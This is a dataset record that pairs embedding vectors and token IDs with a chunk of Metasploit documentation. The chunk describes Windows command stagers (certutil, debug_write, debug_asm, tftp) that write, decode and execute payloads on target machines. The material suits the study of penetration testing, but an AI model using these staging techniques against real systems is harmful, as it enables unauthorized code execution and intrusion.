0.03566170856356621, 0.1904689073562622, -0.42571064829826355, 0.178783118724823, 0.8439027070999146, -0.08807311207056046, -0.8322057127952576, -0.45883703231811523, -0.4414757192134857, -0.07986186444759369, -0.08188144117593765, 0.029057150706648827, -0.662483274936676, 0.8887352347373962, -0.6070372462272644, -0.07613375037908554, 0.18078342080116272, -0.5712440013885498, -0.24523527920246124, 0.18394047021865845, 0.6919919848442078, -0.0264193806797266, 0.6857370138168335, -0.5520216226577759, 0.5614340901374817, 0.5553569793701172, 0.3985570967197418, -0.19683389365673065, 0.20910994708538055, -0.4592130482196808, -0.8216129541397095, 0.7015182971954346, -0.059121664613485336, -0.5659778714179993, 0.7451642155647278, 0.21699167788028717, 0.617976188659668, -0.858945906162262, 1.1498373746871948, 0.7535501718521118, 0.42958319187164307, 0.21612700819969177, -1.0615731477737427, 0.6866145730018616, 0.7314179539680481, -0.10091058909893036, 0.2106163054704666, -0.33189070224761963, -0.04016749560832977, 0.17395353317260742, -0.4985615313053131, -0.3746391832828522, -0.7167028784751892, -0.7153648138046265, 0.6998462677001953, -0.05447683483362198, 1.1250051259994507, -0.10384545475244522, -0.37210777401924133, -0.3274909257888794, -0.18434040248394012, -0.1337977647781372, -0.10131703317165375, -0.020526466891169548, 0.6070684194564819, 0.9709452986717224, -0.2529895603656769, -0.1292702704668045, -0.6684668660163879, -0.2759663760662079, 0.23183199763298035, -0.2362745702266693, -0.5941786170005798, 1.121026873588562, -0.2841261029243469, -0.7275506258010864, -0.40460240840911865, -0.2975926399230957, -0.18316689133644104, -0.08745437860488892, -0.2726680636405945, -0.7870537638664246, -0.12781588733196259, -0.08541487902402878, -0.15762296319007874, 0.40774890780448914, -0.19412049651145935, 0.45883533358573914, -0.83674156665802, 0.08229139447212219, 0.04952395707368851, -0.010888911783695221, 0.3367486298084259, -0.6239838600158691, -0.5239328145980835, -1.1372807025909424, -0.6408721208572388, -0.22827130556106567, 0.20789644122123718, 0.7714056968688965, 0.24447417259216309, 1.071454644203186, 0.12694327533245087, -0.5167892575263977, 0.6543406844139099, 0.10396810621023178, 0.31073662638664246, 0.47588807344436646, -0.48231372237205505, -0.533084511756897, -0.24297872185707092, 0.0533422976732254, 0.7231767177581787, 0.5115373730659485, -0.23839114606380463, -0.4841434359550476, -0.16385896503925323, -0.20135892927646637, -0.17857198417186737, -0.9978212714195251, -0.6432837247848511, -0.7252113819122314, -0.29478082060813904, 0.4551950693130493, -0.10465963184833527, -0.09951143711805344, -0.03597031906247139, -0.3041546642780304, -0.034948140382766724, -0.8780450224876404, 0.7017152309417725, -0.4131718873977661, 0.07096320390701294, 0.16753911972045898, 0.11815270036458969, -0.45062869787216187, -0.7828054428100586, -0.4131372272968292, 0.014641701243817806, 0.06853197515010834, -0.43393033742904663, -0.19927304983139038, 0.1747162640094757, -0.5687760710716248, 0.12416991591453552, -0.3086335062980652, -0.5140474438667297, 0.44325393438339233, -1.0268731117248535, 0.3679177463054657, 1.014959692955017, -0.5132682919502258, 0.787760317325592, 0.6268388032913208, -0.036682307720184326, 0.6080525517463684, -0.9329068064689636, 0.29867663979530334, -0.2286801040172577, 0.4575708210468292, 0.594637393951416, 0.09173399209976196, -0.6851480007171631, 0.6598108410835266, 0.3543091118335724, -0.3903111517429352, 0.22665803134441376, -0.49380001425743103, 0.6929997801780701, -0.34525758028030396, 0.21711330115795135, 0.10479903221130371, 0.6200137138366699, 0.45729199051856995, 0.9860678911209106, -0.42121240496635437, 0.37968873977661133, 0.44314396381378174, -0.12613621354103088, -0.33486244082450867, 0.037145115435123444, 0.09941966831684113, -0.22595752775669098, -0.22121037542819977, 0.3313015103340149, -0.2553967237472534, 0.06841383129358292, 0.010111331008374691, 0.09137739986181259, -0.09912209957838058, -0.35806989669799805, 0.0042328545823693275, 0.8109721541404724, -0.11058543622493744, 0.01754261739552021, 0.45787057280540466, 0.000950438086874783, -0.5308017730712891, -0.018836263567209244, -1.066788911819458, -0.271215558052063, -0.029935449361801147, -0.07436477392911911, -0.5046312212944031, -0.148583322763443, -0.3974725902080536, -0.05953606590628624, 0.2597469687461853, -0.044261157512664795, 0.49407848715782166, 0.017606966197490692, 0.2129124104976654, 1.1559288501739502, -0.22877030074596405, -0.7546785473823547, -0.3921356797218323, 0.43002915382385254, -0.5553452372550964, -0.9447844624519348, 0.2545647621154785, 0.6696097254753113, 0.43190690875053406, 0.21523064374923706, -0.25863513350486755, -0.23110075294971466, 0.14429745078086853, -0.29728204011917114, -0.08556238561868668, 0.3407953381538391, -0.357838898897171, 0.20087459683418274, -0.07680384069681168, 0.2614539563655853, -0.0003722339170053601, 0.14657893776893616, 0.3265639841556549, 0.18940286338329315, -0.32558390498161316, 0.7246257066726685, 0.31325024366378784, -0.12919236719608307, 0.5217921733856201, 0.7938581705093384, 0.6554470658302307, -0.5995064377784729, 0.5402556657791138, -0.7049656510353088, 0.3669024407863617, 0.11049072444438934, 0.5698023438453674, -0.25886595249176025, 0.4870295822620392, 0.34768906235694885, -0.5259132385253906, 0.03470358997583389, 0.7481297850608826, -0.18302394449710846, -0.6915769577026367, 0.03349876031279564, -0.4395744502544403, -0.3555717170238495, -0.2554863393306732, -0.10860681533813477, 0.516487181186676, -0.3983179032802582, 0.13258077204227448, -0.3070608079433441, -0.1923137903213501, 1.0522679090499878, -0.2678147852420807, 0.32713815569877625, 0.13634316623210907, -0.19037558138370514, 0.03186790272593498, 0.10363640636205673, -0.7828870415687561, 0.3305106461048126, 0.7877069115638733, 0.3150193691253662, 0.044301699846982956, 0.7952460646629333, -0.19604511559009552, 0.3750046491622925, 0.32332831621170044, -0.26536881923675537, -0.7498898506164551, 0.20496901869773865, -0.2168189287185669, 0.10559330880641937, -0.2824521064758301, 0.40504902601242065, 0.5362114310264587, -0.2043444812297821, 0.9971000552177429, -0.24976839125156403, 0.020992891862988472, -0.46482521295547485, 0.40076735615730286, -0.08139317482709885, 0.002314857440069318, 0.29260849952697754, -0.23754097521305084, -0.7117385268211365, 1.3256062269210815, 0.5023773908615112, 0.5698447823524475, -0.0459456741809845, 0.6411316394805908, -0.2094702571630478, 0.9082085490226746, -0.24369747936725616, -0.42726677656173706, -0.61990886926651, 0.19548141956329346, -0.8612734079360962, -0.5691595077514648, 0.12784035503864288, -0.1168045923113823, 0.4738558232784271, -0.331112265586853, 0.22478292882442474, -0.20585724711418152, 0.40383443236351013, -0.14762859046459198, -0.7404586672782898, 0.04385093227028847, -0.01172130461782217, -0.5502032041549683, 0.4326065182685852, 0.11550595611333847, 0.1287696212530136, 0.3688304126262665, -0.28162041306495667, -0.7867836952209473, -0.3831934630870819, -0.6182199120521545, 0.18239276111125946, 0.940169095993042, -0.04684886708855629, -0.404657781124115, -0.25873810052871704, -0.5423458814620972, -0.6631957292556763, 0.4817713797092438, -0.5479710102081299, -0.2341785877943039, 0.6540001034736633, 0.6540464758872986, 0.6661937236785889, 0.3064343333244324, -0.22008349001407623, 0.0695658028125763, 0.4278326630592346, 0.6434104442596436, 0.014523940160870552, 0.1929866522550583, -0.3094528913497925, 0.006499546114355326, 0.27520275115966797, -0.5175237059593201, 0.8412109017372131, -0.4307486414909363, -0.04440523684024811, -0.07600867003202438, 0.6980587244033813, -1.2524380683898926, -0.24911904335021973, 0.05759192258119583, 0.5621538162231445, 0.20706085860729218, -0.37723013758659363, -0.9937004446983337, 0.5288987755775452, -0.3236328661441803, -0.09737709909677505, -0.2845287621021271, -0.10154179483652115, -0.023296525701880455, 0.11985859274864197, -0.4199634790420532, -1.1240136623382568, 4.387960910797119, 0.21224991977214813, 0.35296502709388733, 0.5145447254180908, 0.3873266875743866, 0.836800217628479, 0.43738389015197754, -0.5507304668426514, 0.2981472611427307, -0.2463158816099167, -0.07369157671928406, -0.11872407793998718, 0.09879671782255173, 0.351586252450943, 0.44832277297973633, 0.3039267361164093, -0.6011530160903931, 0.0857248529791832, 0.1893170028924942, -0.6380632519721985, -1.0821422338485718, -0.1618969440460205, -0.32150986790657043, 0.870674192905426, -0.4175008535385132, -0.06209561228752136, 0.685132622718811, -0.46812546253204346, 0.4297559857368469, -0.30349019169807434, -0.040766824036836624, -0.15111282467842102, 0.280983030796051, 0.18957017362117767, -0.6343472003936768, 0.3645663559436798, -0.13747116923332214, -0.7311829328536987, -0.37447115778923035, -1.1220401525497437, 0.5142613053321838, 0.062201693654060364, 0.021530067548155785, -0.17775307595729828, -0.17344188690185547, 0.2622833847999573, -1.0187182426452637, 0.2769050598144531, 0.5488758683204651, -0.825275182723999, 0.7934345006942749, -0.2070978730916977, 0.5783586502075195, 0.12213541567325592, -0.9676225185394287, 0.12017298489809036, 0.11061153560876846, -0.1412505805492401, -0.009471091441810131, 0.398775577545166, 1.1059544086456299, -0.5823318958282471, 0.2592979967594147, -0.12834686040878296, -1.0015088319778442, 0.6867069005966187, 0.0017638804856687784, 0.2507381737232208, 0.28859639167785645, -0.08534885942935944, -0.3178774416446686, 0.024121202528476715, -0.2309233695268631, -0.7487119436264038, 0.4935155212879181, -0.5248081684112549, 0.26585903763771057, -0.10569266974925995, 0.5951927900314331, -0.2342565655708313, 0.16693896055221558, -0.4345182180404663, -0.9686270952224731, 0.2958028316497803, 0.4305712580680847, 0.2808816134929657, -0.4153200089931488, -1.1030802726745605, -0.0654291957616806, 0.47978475689888, 0.48552408814430237, 0.28010040521621704, -0.2918533980846405, 0.4869970977306366, -0.04370786249637604 ]
[ 6767, 3489, 8545, 13578, 15500, 24475, 25856, 27767, 3388, 1058, 5910, 3094, 2754, 2099, 1011, 3645, 2069, 10760, 1058, 5910, 3094, 2754, 2099, 2003, 2005, 3645, 1012, 2054, 2023, 2515, 2003, 2009, 4372, 23237, 2256, 18093, 2007, 2918, 21084, 1010, 3828, 2009, 2006, 1996, 4539, 3698, 1010, 2036, 7009, 1037, 1058, 5910, 5896, 2478, 1996, 9052, 3094, 1010, 1998, 2059, 11082, 1996, 1058, 5910, 5896, 2000, 21933, 3207, 1996, 2918, 21084, 18093, 1010, 1998, 15389, 2009, 1012, 2065, 2017, 2024, 18077, 2075, 3645, 2008, 6753, 4204, 18223, 1010, 2059, 2017, 2453, 2215, 2000, 5136, 2478, 2008, 2612, 1997, 1996, 1058, 5910, 2754, 2099, 1010, 2138, 4204, 18223, 12102, 2000, 2022, 2062, 22150, 2100, 1012, 2000, 2224, 1996, 1058, 5910, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 1058, 5910, 1005, 1033, 2030, 2275, 1996, 1024, 1058, 5910, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 1058, 5910, 1007, 2017, 2097, 2036, 2342, 2000, 2191, 2469, 1996, 11336, 1521, 1055, 3569, 7248, 2421, 3645, 1006, 2036, 1999, 1996, 27425, 1007, 1010, 2742, 1024, 1005, 4132, 1005, 1027, 1028, 1005, 2663, 1005, 8292, 5339, 21823, 2140, 3094, 2754, 2099, 1011, 3645, 2069, 17119, 8525, 3775, 2140, 2003, 1037, 3645, 3094, 2008, 2064, 2022, 2109, 2000, 15653, 1998, 4653, 10618, 3691, 1010, 9563, 2592, 1010, 9530, 8873, 27390, 2063, 8196, 2578, 1010, 2067, 2039, 1998, 9239, 6187, 6177, 1010, 4385, 1012, 2009, 2069, 3310, 2007, 10947, 3645, 3001, 3225, 2013, 3645, 2262, 1010, 1998, 3645, 1022, 1012, 1045, 2424, 1996, 8292, 5339, 21823, 2140, 14894, 16801, 1010, 2004, 8292, 5339, 21823, 2140, 2064, 2022, 2109, 2000, 8816, 6764, 2074, 2066, 1059, 18150, 1998, 3027, 2361, 1010, 2057, 2079, 2025, 2224, 2009, 2008, 2126, 2182, 1025, 2612, 2057, 2224, 9052, 2000, 4339, 1996, 5371, 2004, 1037, 2918, 21084, 12359, 8196, 1010, 1998, 2059, 2057, 2224, 8292, 5339, 21823, 2140, 2000, 21933, 3207, 2009, 3188, 2000, 7781, 1024, 9052, 1011, 1011, 1011, 1011, 1011, 4088, 8196, 1011, 1011, 1011, 1011, 1011, 1028, 12359, 1012, 19067, 2102, 9052, 2074, 2918, 21084, 4372, 16044, 2115, 12441, 2951, 9052, 2694, 10441, 11057, 1027, 1027, 1028, 1028, 12359, 1012, 19067, 2102, 9052, 1011, 1011, 1011, 1011, 1011, 2203, 8196, 1011, 1011, 1011, 1011, 1011, 1028, 1028, 12359, 1012, 19067, 2102, 8292, 5339, 21823, 2140, 1011, 21933, 3207, 12359, 1012, 19067, 2102, 21933, 5732, 1012, 8026, 2000, 2202, 5056, 1997, 2008, 1010, 1996, 8292, 5339, 21823, 2140, 3094, 2754, 2099, 2097, 3828, 1996, 18093, 1999, 2918, 21084, 2004, 1037, 8275, 8196, 1010, 3198, 8292, 5339, 21823, 2140, 2000, 21933, 3207, 2009, 1010, 1998, 2059, 2633, 15389, 2009, 1012, 2000, 2224, 1996, 8292, 5339, 21823, 2140, 3094, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 8292, 5339, 21823, 2140, 1005, 1033, 2030, 2275, 1996, 1024, 8292, 5339, 21823, 2140, 3145, 2000, 15389 ]
metasploit
107.txt
7
_ cmdstager : execute _ cmdstager ( flavor : : certutil ) you will also need to remember to set the platform in the metadata :'platform'= >'win'debug _ write command stager - windows onlythe debug _ write command stager is an old windows trick to write a file to the system. in this case, we use debug. exe to write a small. net binary, and that binary will take a hex - ascii file created by the echo command, decode the binary, and finally execute. obviously, to be able to use this command stager, you must make sure the target is a windows system that supports. net. to use the debug _ write command stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['debug _ write'] or set the : debug _ write key to execute _ cmdstager : execute _ cmdstager ( flavor : : debug _ write ) you will also need to remember to set the platform in the metadata :'platform'= >'win'debug _ asm command stager - windows onlythe debug _ asm command stager is another old windows trick used to assemble a com file, and then com file will decode our hex - ascii payload, and then execute it. to use the debug _ asm command stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['debug _ asm'] or set the : debug _ asm key to execute _ cmdstager : execute _ cmdstager ( flavor : : debug _ asm ) you will also need to remember to set the platform in the metadata :'platform'= >'win'tftp command stager - windows onlythe tftp command stager uses tftpd. exe to download our payload, and then use the start. exe command to execute it. this technique only works well against an older version of windows ( such as xp ), because newer windows machines no longer install tftp. exe by default. the tftp command stager must bind to udp port 69, so msfconsole must be started as root : rvms
[ 0.23733334243297577, -0.3765116035938263, 0.12975779175758362, 0.56874018907547, -0.08991974592208862, -0.37245339155197144, -0.5369502902030945, 0.3883213996887207, 0.6768086552619934, 0.562458872795105, -0.39919859170913696, -0.02319854497909546, 0.6322759389877319, -0.6164885759353638, 0.34844380617141724, -0.4019811749458313, -0.9060602188110352, -0.333136647939682, -1.6013903617858887, -0.1024879589676857, 0.175007164478302, -0.16368114948272705, -0.8131849765777588, -0.7394137382507324, -0.00943844672292471, -0.2554760277271271, 0.09707804769277573, -0.10062999278306961, 0.10343986004590988, 0.07757072895765305, 0.4513877332210541, -0.7527889013290405, -0.21309830248355865, -0.3880786895751953, 0.408449649810791, 0.10880469530820847, 0.35325708985328674, -0.4306110143661499, 0.2146170288324356, -0.23608644306659698, 0.88279789686203, -0.271293580532074, 0.0287174005061388, -0.4934583306312561, -0.6434683799743652, -0.6413724422454834, 0.3615990877151489, -0.36588892340660095, 0.28083378076553345, 0.7030810713768005, 0.13546578586101532, -0.2361442893743515, -0.18068258464336395, 0.6514267921447754, -0.6130487322807312, -0.5136567950248718, -0.417208731174469, 0.3151083290576935, -0.2638973891735077, 0.43618980050086975, -0.08343684673309326, 0.2825722396373749, 0.39455804228782654, -0.26038041710853577, -0.7010302543640137, 0.13579469919204712, -0.49066469073295593, -0.6940361261367798, -0.25193122029304504, 0.26142287254333496, 0.2268073856830597, 0.4892998933792114, -0.009995994158089161, -0.18782678246498108, -0.4875315725803375, 0.04414251819252968, 0.07794637233018875, -0.6544154286384583, -0.25311505794525146, -0.17613781988620758, -0.3794635832309723, 0.3319583833217621, 0.09311230480670929, -0.5919603705406189, 0.13582029938697815, -0.5297771692276001, 0.5868358612060547, 0.5523974895477295, 0.1995982825756073, 0.4520453214645386, 0.3551812469959259, 0.30583444237709045, -0.24478261172771454, 0.2094935178756714, 0.6190990805625916, 0.5612339973449707, -0.11994077265262604, -0.08090846240520477, 0.4244672656059265, 0.01946841925382614, 0.9722612500190735, 0.37560176849365234, 0.23380902409553528, -0.03424907475709915, -0.22762763500213623, 0.46824911236763, -0.045519545674324036, -0.6235787868499756, -0.6727180480957031, -0.6775966882705688, 0.6347904205322266, -0.3576928675174713, -0.2541971504688263, -0.5533849000930786, 0.14431363344192505, 0.695923388004303, 0.24300912022590637, 0.1686423420906067, -0.45248639583587646, 0.4401096999645233, -0.15175043046474457, -0.0595359206199646, -0.06798431277275085, -0.680038571357727, 0.5250871181488037, 0.25720342993736267, 0.33557990193367004, 0.5995336174964905, -0.6851463317871094, -0.936738908290863, 0.055588942021131516, -0.4069002866744995, -0.31776508688926697, 0.9610347151756287, -0.042238131165504456, 1.0704100131988525, 0.39884018898010254, 0.018072934821248055, 0.7759942412376404, -0.7098609805107117, -0.017424697056412697, -0.03603294491767883, 0.5764513611793518, 1.461891770362854, 0.035049453377723694, -0.21858631074428558, -0.2815893590450287, 0.4930344521999359, -0.6276130080223083, 0.751949667930603, -0.31027013063430786, 0.09242869913578033, 0.4070759117603302, -0.0654408186674118, -0.5763130784034729, 0.008265671320259571, -0.5938590168952942, 0.6247504353523254, -0.25362300872802734, -0.2755272090435028, -0.05179451406002045, 0.5504963397979736, -0.11075397580862045, 0.28397154808044434, -0.1704052984714508, 0.6120710372924805, -1.1423946619033813, -0.4850858151912689, -0.25748175382614136, -0.2721008360385895, 0.0562349371612072, -0.35297977924346924, -0.12813955545425415, 0.23169127106666565, 1.5419343709945679, 0.9060771465301514, 0.181576207280159, -0.3617197275161743, 0.8496789932250977, 0.4246290922164917, -1.4106581211090088, 0.8270522356033325, 0.414389044046402, 0.8018576502799988, 0.1741952896118164, 0.5960137844085693, 0.033060844987630844, -0.7196852564811707, -0.0902024656534195, 0.21008236706256866, 0.4931710362434387, 0.827938437461853, -0.5707597732543945, 0.19872531294822693, 0.14100514352321625, 0.5791274309158325, -1.1280635595321655, 0.2268102765083313, -0.4580710530281067, -1.897932767868042, -0.21796901524066925, 0.16217738389968872, 0.2051967829465866, 0.3028162121772766, -0.1442006677389145, -0.5672082901000977, 0.7549163699150085, -0.016060683876276016, -0.1724262237548828, 0.629857063293457, 0.613115668296814, -0.0040938761085271835, -0.4824167788028717, -0.1598658561706543, -0.02626718208193779, 0.41544732451438904, -0.37693890929222107, 0.101314477622509, -0.29168444871902466, 0.7400189638137817, 0.27637001872062683, 0.4280460774898529, 0.9786795377731323, 0.29958459734916687, -0.32712000608444214, -0.7676198482513428, 0.2834099531173706, 0.05621086061000824, -0.4551841616630554, 0.003980623092502356, -0.39125367999076843, 0.2648927867412567, 0.6661715507507324, 0.1227804645895958, 0.6848767995834351, -0.34667226672172546, 0.497181236743927, -0.24280279874801636, -0.03796389698982239, 0.24614769220352173, -0.1925349235534668, 0.7792627811431885, 0.3143690228462219, 0.8929021954536438, 0.016624175012111664, 0.5376324653625488, -0.3646984398365021, -0.4011198878288269, 0.6257001757621765, 0.23718596994876862, 0.11513105034828186, 1.1213181018829346, -0.07604307681322098, -0.33278635144233704, -0.6231657862663269, -0.528702974319458, 0.23862957954406738, 0.5723332762718201, -0.5657339692115784, -1.0124497413635254, -0.25614216923713684, 0.26310715079307556, -0.564483642578125, -0.14900045096874237, 0.015007141046226025, 0.8765621781349182, -0.33894214034080505, 0.2262277603149414, 0.11404869705438614, -0.5471638441085815, -0.06635453552007675, -0.38749539852142334, -0.7061718106269836, -0.2966775596141815, -0.5430065393447876, -0.5161902904510498, 0.6159559488296509, -0.3389902114868164, -0.0511399507522583, -0.25590944290161133, -0.6498541831970215, -0.19158527255058289, -0.16091634333133698, 0.8809973001480103, 0.4740670323371887, -0.060957394540309906, -0.2959895431995392, 0.370525598526001, -0.43393436074256897, 0.9272236824035645, 0.04479261115193367, -0.41382741928100586, -0.02203643135726452, -0.04346131905913353, -0.39549386501312256, -0.29616230726242065, 0.5242919921875, 0.2138177454471588, 0.5505118370056152, -0.1073005348443985, -0.15984636545181274, -0.2641555070877075, 0.23205751180648804, 0.6812435984611511, -0.5801733136177063, 0.43203961849212646, -0.3266741931438446, -0.25189903378486633, 0.20905375480651855, 0.8266091346740723, -0.552693784236908, 0.4543910622596741, -0.009553157724440098, 0.6784367561340332, -0.5960712432861328, 0.8261542916297913, 0.24246127903461456, -0.2953439950942993, -0.3100452423095703, -0.007744030095636845, 0.1991824209690094, -0.36235663294792175, -0.15015959739685059, -0.40258386731147766, -0.23149636387825012, 1.095443606376648, -0.1908448040485382, -0.6187356114387512, 0.2393893450498581, -0.08510308712720871, 0.6981745362281799, 0.22477442026138306, -0.17355723679065704, 0.6537119746208191, 0.3447481691837311, 0.22280776500701904, -0.681358814239502, -0.3311954140663147, -0.37193575501441956, 0.1207091212272644, -0.5194529891014099, -0.40205118060112, 0.02271665818989277, 0.37914544343948364, 0.4802513122558594, 0.2750653624534607, 0.06107548996806145, -1.1958273649215698, 0.20972825586795807, -0.6358356475830078, -0.5049745440483093, -0.29250091314315796, -0.44203847646713257, 0.5388293862342834, 0.5084906220436096, 0.8279796242713928, -0.5463420152664185, -0.7276579141616821, 0.22684846818447113, 0.3697000741958618, 0.32215845584869385, 0.0434909388422966, 0.0559476874768734, -0.10895130783319473, -0.8802477121353149, -0.25167208909988403, 0.5591161847114563, 0.41032832860946655, 0.7665591835975647, -0.3198380768299103, 0.30015119910240173, 0.21674467623233795, -0.6753771305084229, 0.0843285322189331, -0.9318786263465881, -0.27660584449768066, 0.5910013914108276, -0.43022122979164124, 0.2859828770160675, 0.1300124228000641, -0.1346299648284912, -0.5111269354820251, -0.17308981716632843, 0.09450644254684448, 0.16394615173339844, -0.40956979990005493, 0.014978170394897461, -0.6359236240386963, -0.009490079246461391, -0.6043173670768738, 0.04783385619521141, -0.2965327799320221, 0.4604909121990204, -0.6057726740837097, -0.810978889465332, -0.2986336052417755, 0.6533018350601196, 0.904186487197876, 0.8209394216537476, 0.2714204490184784, 0.3405988812446594, 0.08875606209039688, -0.6700795292854309, 0.8964583277702332, -0.32371750473976135, 0.211954265832901, 0.24274039268493652, 0.295989990234375, 0.24821332097053528, 1.097121238708496, 0.4794042110443115, -0.13754726946353912, -0.9752811193466187, 0.17584463953971863, -0.18555498123168945, 0.027820128947496414, -0.8211026787757874, -0.1579599827528, -0.29020956158638, 0.4768926799297333, -0.5515753030776978, -0.5339511036872864, -0.5424492955207825, 0.7969792485237122, 0.4542819857597351, -0.8526592254638672, -0.7998471856117249, -0.4418592154979706, 0.5159898400306702, 0.12041949480772018, -0.3536929488182068, -0.1483055055141449, -0.8600208163261414, -0.2278958410024643, -0.4569900929927826, 0.5652201175689697, 0.7214303016662598, 0.3168879747390747, -0.41032108664512634, -1.2892580032348633, -0.5334029793739319, 0.30150306224823, -0.14204083383083344, -0.2692258656024933, -0.1050361916422844, 0.3504301607608795, 0.12257400900125504, 0.37707027792930603, -0.6836309432983398, -0.2804328203201294, -0.32679641246795654, -0.600339949131012, 0.3027517795562744, -0.6177019476890564, 0.011171906255185604, 0.12401602417230606, -0.6177343726158142, 0.5330339670181274, -0.15249858796596527, -0.23304317891597748, -0.44145631790161133, -0.29489877820014954, 0.18351911008358002, -0.07757926732301712, -0.19927741587162018, 0.9373903274536133, -0.3722133934497833, 0.36498793959617615, 0.4972553551197052, 0.2791336476802826, 0.24365858733654022, 0.39273545145988464, -0.18106091022491455, -0.1804400086402893, 0.06123879551887512, -0.4793819487094879, 0.3267853856086731, -0.43320778012275696, -0.16514095664024353, -0.02385704778134823, -0.3843767046928406, 1.0575984716415405, 0.42604634165763855, 0.5790476202964783, -0.6559674143791199, -0.6128183603286743, 0.5700342655181885, 0.23385272920131683, 0.5612297058105469, -0.377656489610672, -0.29015031456947327, -0.17723014950752258, 0.026200223714113235, -0.3473781943321228, -0.5100166201591492, -1.1250505447387695, -0.06481336057186127, -0.052561063319444656, -0.17683829367160797, 0.2547536790370941, 0.36921918392181396, -0.4131963849067688, -0.3599029779434204, -0.09318505227565765, -0.6465997695922852, 0.11249334365129471, -0.09781162440776825, 0.14794611930847168, -0.3883035182952881, 0.11159850656986237, -0.3235943019390106, 0.5549131631851196, -0.2956062853336334, -0.14817450940608978, 0.5028964877128601, 0.7468351721763611, 0.1565643697977066, -0.2567712068557739, -0.7481392621994019, -0.0016628792509436607, 0.1447427123785019, 0.06870035827159882, 0.184764564037323, 0.7092801332473755, -0.4255307912826538, -0.06456317007541656, -0.0012314721243456006, -0.45994681119918823, -0.9299893379211426, -0.8638765811920166, 0.42591971158981323, -0.0205085426568985, 0.21740491688251495, -0.16337716579437256, -0.8086357712745667, -0.5362666845321655, 0.009271853603422642, 0.5891320109367371, -1.2032244205474854, -0.4356544017791748, -0.49594801664352417, 0.4968430697917938, -0.14911654591560364, 0.24873580038547516, -0.800912082195282, -0.5526633858680725, -0.21634645760059357, -0.016080450266599655, 0.09869563579559326, 0.07333599030971527, -0.07537001371383667, 0.34177365899086, 0.8359143733978271, -0.5966350436210632, -0.8442912101745605, -0.24015210568904877, -0.2851690649986267, -0.3135591447353363, 0.0031217695213854313, 0.18316009640693665, -0.3924795091152191, 0.9371418952941895, -0.5358308553695679, 0.1528426557779312, 0.11215059459209442, 0.4181213080883026, -0.19757938385009766, -0.09986396133899689, 0.10005680471658707, -0.2890465259552002, 0.4852030277252197, -0.24804840981960297, 0.6902148127555847, 0.5386775732040405, -0.25725263357162476, -0.8818747401237488, -0.014017759822309017, -0.7846156358718872, -1.2770012617111206, 0.6276381015777588, -0.4711054265499115, -0.5411538481712341, 0.7861756682395935, -0.3024759292602539, 0.6812117099761963, -0.7042996883392334, 0.7755868434906006, 0.5818113684654236, 0.24033145606517792, 0.23597191274166107, -0.8134647607803345, 0.6772924065589905, 0.4670692980289459, -0.6543870568275452, 0.05830354243516922, 0.21462851762771606, 0.033067941665649414, -0.18494072556495667, -0.22954469919204712, -0.18673238158226013, -0.3605228364467621, -0.39551475644111633, 0.7311941981315613, -0.5438488125801086, 0.6140151619911194, -0.3854593336582184, -0.848774790763855, -0.38858363032341003, 0.28304222226142883, -0.08317471295595169, -0.25987324118614197, 0.08298790454864502, 0.08959979563951492, 0.8544082641601562, -0.060404740273952484, -0.28963807225227356, -0.49318718910217285, 0.20706357061862946, 0.2752619683742523, 0.31856483221054077, -0.6669327020645142, 1.404739260673523, -0.5959731936454773, -0.867646336555481, -0.35908636450767517, -0.5421931147575378, -0.08538088202476501, 0.041023701429367065, -0.41511669754981995, -1.067632794380188, -0.09690015017986298, 0.1855853646993637, 0.19668491184711456, 0.7303022742271423, -0.3788008689880371, 0.29398784041404724, -0.47026488184928894, -0.08019359409809113, -0.056209344416856766, 0.16073192656040192, 0.40571290254592896, -0.5960952639579773, -0.21383891999721527, -1.0102325677871704, -0.43937948346138, -0.1926521509885788, 0.3820010721683502, 0.7923398613929749, 0.1349993199110031, 0.7501051425933838, -0.21299898624420166, 0.08669760078191757, 1.1717398166656494, 0.3426690697669983, 0.1441296488046646, 0.37856146693229675, -0.13328246772289276, -0.46395283937454224, -0.666597843170166, 0.06362701207399368, 0.2902531325817108, 0.5531747341156006, 0.044621411710977554, -0.4823189675807953, -0.06153232976794243, -0.02075774036347866, -0.19100940227508545, -0.974157989025116, -0.4979928433895111, -0.6158992648124695, -0.23744536936283112, 0.6608777046203613, -0.07026847451925278, 0.4714009165763855, -0.2014668881893158, 0.33675438165664673, -0.20703691244125366, -0.41936758160591125, 0.5044289231300354, -0.049943797290325165, 0.12134316563606262, 0.2577701508998871, 0.20807577669620514, -0.27269062399864197, -0.3816254138946533, -0.4488523006439209, 0.1797499656677246, 0.03658485412597656, -0.4109070897102356, -0.18696929514408112, 0.07092421501874924, -0.8113403916358948, -0.06891423463821411, -0.6868956089019775, 0.3026261031627655, 0.1068902462720871, -1.1049604415893555, 0.6209218502044678, 0.5831998586654663, -0.20442983508110046, 0.5920515060424805, 0.45832547545433044, -0.054901592433452606, 0.3801020681858063, -0.7214093804359436, 0.5400251150131226, -0.2856740653514862, 0.6534863710403442, 0.5370908379554749, 0.21339093148708344, -0.45927920937538147, 0.18227443099021912, 0.2888049781322479, -0.4148126542568207, 0.2699589133262634, -0.83096843957901, -0.1627012938261032, -0.34396395087242126, 0.5080962181091309, 0.31078627705574036, 1.1715461015701294, 0.5815252661705017, 0.812178909778595, -0.14815156161785126, 0.39574867486953735, 0.2513544261455536, 0.018896957859396935, -0.06455978751182556, 0.08181264251470566, 0.33699357509613037, 0.04121151193976402, -0.5512169003486633, 0.0922904908657074, 0.027617651969194412, 0.14995312690734863, 0.31875133514404297, 0.13116887211799622, -0.3855540454387665, 0.09254249185323715, 0.4352162480354309, 0.4765332043170929, 0.16299781203269958, 0.415404349565506, 0.9323403239250183, -0.15583102405071259, -0.5447492003440857, -0.24127240478992462, -0.7143455147743225, -0.5901104211807251, 0.006133595947176218, 0.26152604818344116, -0.10018355399370193, -0.5186083316802979, 0.2611912190914154, -0.4929274916648865, 0.25431138277053833, -0.30150094628334045, 0.5517632961273193, 0.42262184619903564, -0.21773453056812286, 0.9851187467575073, -0.44162601232528687, 